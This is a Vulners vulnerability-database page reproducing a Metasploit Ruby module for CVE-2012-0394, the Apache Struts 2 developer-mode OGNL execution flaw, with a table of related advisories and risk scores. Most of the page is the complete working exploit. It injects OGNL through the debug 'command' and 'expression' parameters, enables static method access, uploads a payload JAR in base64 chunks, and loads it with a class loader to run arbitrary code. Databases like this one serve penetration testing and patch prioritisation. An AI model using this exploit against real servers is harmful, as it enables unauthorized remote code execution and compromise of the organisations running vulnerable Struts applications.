Vulners
Lucene search
Apache Struts - Developer Mode OGNL Execution (Metasploit)
| Reporter | Title | Published | Views | Family All 27 |
|---|---|---|---|---|
 | Apache Struts Developer Mode OGNL Execution Exploit | 4 Feb 201400:00 | – | zdt |
 | Security Bulletin: Order Management could be subject to multiple cross-site scripting (XSS) vulnerabilities in XWork in Apache Struts 2.x. | 12 Apr 202417:35 | – | ibm |
 | CVE-2012-0394 | 6 Jan 201200:00 | – | circl |
 | Apache Struts Debugging Interceptor Remote Code Execution (CVE-2012-0394) | 17 Feb 201400:00 | – | checkpoint_advisories |
 | CVE-2012-0394 | 8 Jan 201215:00 | – | cve |
 | CVE-2012-0394 | 8 Jan 201215:00 | – | cvelist |
 | Apache-Struts ExceptionDelegator < 2.3.1.1 RCE Linux | 24 Mar 201200:00 | – | dsquare |
| Apache-Struts DebuggingInterceptor < 2.3.1.1 RCE Windows | 24 Mar 201200:00 | – | dsquare |
| Apache-Struts DebuggingInterceptor < 2.3.1.1 RCE Linux | 24 Mar 201200:00 | – | dsquare |
 | K25570584: Apache Struts vulnerability CVE-2012-0394 | 21 Feb 202319:50 | – | f5 |
10
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'Apache Struts Developer Mode OGNL Execution',
'Description' => %q{
This module exploits a remote command execution vulnerability in Apache
Struts 2. The problem exists on applications running in developer mode,
where the DebuggingInterceptor allows evaluation and execution of OGNL
expressions, which allows remote attackers to execute arbitrary Java
code. This module has been tested successfully in Struts 2.3.16, Tomcat
7 and Ubuntu 10.04.
},
'Author' =>
[
'Johannes Dahse', # Vulnerability discovery and PoC
'Andreas Nusser', # Vulnerability discovery and PoC
'Alvaro', # @pwntester, 2014's PoC, avoided surname because of the spanish char, sorry about that :\
'juan vazquez' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2012-0394'],
[ 'OSVDB', '78276'],
[ 'EDB', '18329'],
[ 'URL', 'https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20120104-0_Apache_Struts2_Multiple_Critical_Vulnerabilities.txt' ],
[ 'URL', 'http://www.pwntester.com/blog/2014/01/21/struts-2-devmode/' ]
],
'Platform' => 'java',
'Arch' => ARCH_JAVA,
'Targets' =>
[
[ 'Struts 2', { } ]
],
'DisclosureDate' => 'Jan 06 2012',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(8080),
OptString.new('TARGETURI', [ true, 'The path to a struts application action', "/struts2-blank/example/HelloWorld.action"])
], self.class)
end
def check
vprint_status("Testing to see if the target can evaluate our Java code...")
addend_one = rand_text_numeric(rand(3) + 1).to_i
addend_two = rand_text_numeric(rand(3) + 1).to_i
sum = addend_one + addend_two
res = execute_command("new java.lang.Integer(#{addend_one}+#{addend_two})")
if res and res.code == 200 and res.body.to_i == sum
return Exploit::CheckCode::Vulnerable
end
if res and res.code == 200 and res.body.to_s =~ /#{sum}/
vprint_status("Code got evaluated. Target seems vulnerable, but the response contains something else:")
vprint_line(res.body.to_s)
return Exploit::CheckCode::Appears
end
return CheckCode::Safe
end
def exploit
@payload_jar = rand_text_alphanumeric(4+rand(4)) + ".jar"
upload_jar
execute_jar
end
def upload_jar
append = 'false'
jar = payload.encoded_jar.pack
chunk_length = 384 # 512 bytes when base64 encoded
while(jar.length > chunk_length)
java_upload_part(jar[0, chunk_length], @payload_jar, append)
jar = jar[chunk_length, jar.length - chunk_length]
append='true'
end
java_upload_part(jar, @payload_jar, append)
end
def java_upload_part(part, filename, append = 'false')
cmd = "#f=new java.io.FileOutputStream('#{filename}',#{append}),"
cmd << "#f.write(new sun.misc.BASE64Decoder().decodeBuffer('#{Rex::Text.encode_base64(part)}')),"
cmd << "#f.close()"
execute_command(cmd)
end
def execute_jar
cmd = ""
# disable Vararg handling (since it is buggy in OGNL used by Struts 2.1
cmd << "#[email protected]@forName('ognl.OgnlRuntime').getDeclaredField('_jdkChecked'),"
cmd << "#q.setAccessible(true),#q.set(null,true),"
cmd << "#[email protected]@forName('ognl.OgnlRuntime').getDeclaredField('_jdk15'),"
cmd << "#q.setAccessible(true),#q.set(null,false),"
# create classloader
cmd << "#cl=new java.net.URLClassLoader(new java.net.URL[]{new java.io.File('#{@payload_jar}').toURI().toURL()}),"
# load class
cmd << "#c=#cl.loadClass('metasploit.Payload'),"
# invoke main method
cmd << "#c.getMethod('main',new java.lang.Class[]{@java.lang.Class@forName('[Ljava.lang.String;')}).invoke("
cmd << "null,new java.lang.Object[]{new java.lang.String[0]})"
execute_command(cmd)
end
def execute_command(cmd)
injection = "#f=#_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess'),#f.setAccessible(true),#f.set(#_memberAccess,true),CMD"
injection.gsub!(/CMD/, cmd)
vprint_status("Attempting to execute: #{cmd}")
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path.to_s),
'method' => 'GET',
'vars_get' =>
{
'debug' => 'command',
'expression' => injection
}
})
return res
end
endData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
05 Feb 2014 00:00Current
7High risk
Vulners AI Score7
CVSS 26.8
EPSS0.93572